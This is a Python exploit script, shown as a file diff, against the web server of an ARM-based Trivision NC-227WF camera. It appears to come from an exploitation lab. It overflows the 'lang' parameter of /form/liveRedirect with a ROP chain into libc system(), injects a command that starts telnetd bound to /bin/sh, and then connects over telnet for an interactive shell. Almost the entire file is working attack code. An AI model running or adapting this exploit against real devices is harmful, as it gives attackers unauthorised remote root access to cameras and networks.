■ ■ ■ ■ ■ ■
trivision_nc227wf_expl.py
| | 1 | + | #!/usr/bin/python |
| | 2 | + | from telnetlib import Telnet |
| | 3 | + | import os, struct, sys, re, socket |
| | 4 | + | import time |
| | 5 | + | |
| | 6 | + | ##### HELPER FUNCTIONS ##### |
| | 7 | + | |
| | 8 | + | def pack32(value): |
| | 9 | + | return struct.pack("<I", value) # little byte order |
| | 10 | + | |
| | 11 | + | def pack16n(value): |
| | 12 | + | return struct.pack(">H", value) # big/network byte order |
| | 13 | + | |
| | 14 | + | def urlencode(buf): |
| | 15 | + | s = "" |
| | 16 | + | for b in buf: |
| | 17 | + | if re.match(r"[a-zA-Z0-9\/]", b) is None: |
| | 18 | + | s += "%%%02X" % ord(b) |
| | 19 | + | else: |
| | 20 | + | s += b |
| | 21 | + | return s |
| | 22 | + | |
| | 23 | + | ##### HELPER FUNCTIONS FOR ROP CHAINING ##### |
| | 24 | + | |
| | 25 | + | # function to create a libc gadget |
| | 26 | + | # requires a global variable called libc_base |
| | 27 | + | def libc(offset): |
| | 28 | + | return pack32(libc_base + offset) |
| | 29 | + | |
| | 30 | + | # function to represent data on the stack |
| | 31 | + | def data(data): |
| | 32 | + | return pack32(data) |
| | 33 | + | |
| | 34 | + | # function to check for bad characters |
| | 35 | + | # run this before sending out the payload |
| | 36 | + | # e.g. detect_badchars(payload, "\x00\x0a\x0d/?") |
| | 37 | + | def detect_badchars(string, badchars): |
| | 38 | + | for badchar in badchars: |
| | 39 | + | i = string.find(badchar) |
| | 40 | + | while i != -1: |
| | 41 | + | sys.stderr.write("[!] 0x%02x appears at position %d\n" % (ord(badchar), i)) |
| | 42 | + | i = string.find(badchar, i+1) |
| | 43 | + | |
| | 44 | + | ##### MAIN ##### |
| | 45 | + | |
| | 46 | + | if len(sys.argv) != 3: |
| | 47 | + | print("Usage: expl.py <ip> <port>") |
| | 48 | + | sys.exit(1) |
| | 49 | + | |
| | 50 | + | ip = sys.argv[1] |
| | 51 | + | port = sys.argv[2] |
| | 52 | + | |
| | 53 | + | libc_base = 0x40021000 |
| | 54 | + | |
| | 55 | + | buf = "A" * 284 |
| | 56 | + | #buf += "BBBB" |
| | 57 | + | |
| | 58 | + | """ |
| | 59 | + | 0x40060b58 <+32>: ldr r0, [sp, #4] |
| | 60 | + | 0x40060b5c <+36>: pop {r1, r2, r3, lr} |
| | 61 | + | 0x40060b60 <+40>: bx lr |
| | 62 | + | """ |
| | 63 | + | ldr_r0_sp = pack32(0x40060b58) |
| | 64 | + | |
| | 65 | + | # 0x00033a98: mov r0, sp; mov lr, pc; bx r3; |
| | 66 | + | mov_r0 = pack32(libc_base + 0x00033a98) |
| | 67 | + | system = pack32(0x4006079c) |
| | 68 | + | |
| | 69 | + | buf += ldr_r0_sp |
| | 70 | + | |
| | 71 | + | |
| | 72 | + | buf += "BBBB" |
| | 73 | + | buf += "CCCC" |
| | 74 | + | #buf += "DDDD" |
| | 75 | + | buf += system |
| | 76 | + | #buf += "EEEE" |
| | 77 | + | buf += mov_r0 |
| | 78 | + | buf += "telnetd${IFS}-l/bin/sh;#" |
| | 79 | + | |
| | 80 | + | """ |
| | 81 | + | buf += "FFFF" |
| | 82 | + | buf += "GGGG" |
| | 83 | + | buf += "HHHH" |
| | 84 | + | """ |
| | 85 | + | |
| | 86 | + | |
| | 87 | + | buf += "C" * (400-len(buf)) |
| | 88 | + | |
| | 89 | + | lang = buf |
| | 90 | + | |
| | 91 | + | request = "GET /form/liveRedirect?lang=%s HTTP/1.0\n" % lang + \ |
| | 92 | + | "Host: BBBBBBBBBBBB\nUser-Agent: ARM/exploitlab\n\n" |
| | 93 | + | |
| | 94 | + | #print request, |
| | 95 | + | |
| | 96 | + | |
| | 97 | + | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
| | 98 | + | s.connect((ip, int(port))) |
| | 99 | + | s.send(request) |
| | 100 | + | s.recv(100) |
| | 101 | + | |
| | 102 | + | time.sleep(2) |
| | 103 | + | tn = Telnet(ip, 23) |
| | 104 | + | tn.interact() |
| | 105 | + | |
| | 106 | + | |
| | 107 | + | |
